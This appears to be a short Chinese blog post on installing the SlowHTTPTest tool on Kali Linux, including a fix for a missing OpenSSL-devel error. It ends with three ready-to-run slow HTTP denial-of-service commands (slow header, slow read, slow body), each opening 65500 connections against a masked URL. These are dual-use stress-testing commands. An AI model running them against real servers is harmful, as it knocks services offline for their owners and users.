摘要
kali下安装:
当安装SlowHTTPTest出现:
configure: error: OpenSSL-devel is missing
需要安装libssl-dev跟openssh,有的需要安装openssh-devel,但这里没有安装openssh-devel,只安装libssl-devl跟openssh
root@kali:~# apt-get install libssl-dev 安装libssl-dev或在此搜索https://apt-browse.org/下载手动安装
root@kali:~/Downloads/slowhttptest-1.5# ./configure 安装slowhttptest-1.5
root@kali:~/Downloads/slowhttptest-1.5# make&make install测试命令:
slow header
slowhttptest -c 65500 -H -i 10 -r 200 -s 8192 -t SLOWHEADER -u http://*****
slow read
slowhttptest -c 65500 -X -r 1000 -w 10 -y 20 -t SLOWREAD -n 5 -z 32 -u http://*****
slow post
slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u http://*****
下载地址:
链接:http://pan.baidu.com/s/1dE0INdR 密码:asg3
您可以选择一种方式赞助本站
支付宝转账赞助
目前评论:0 条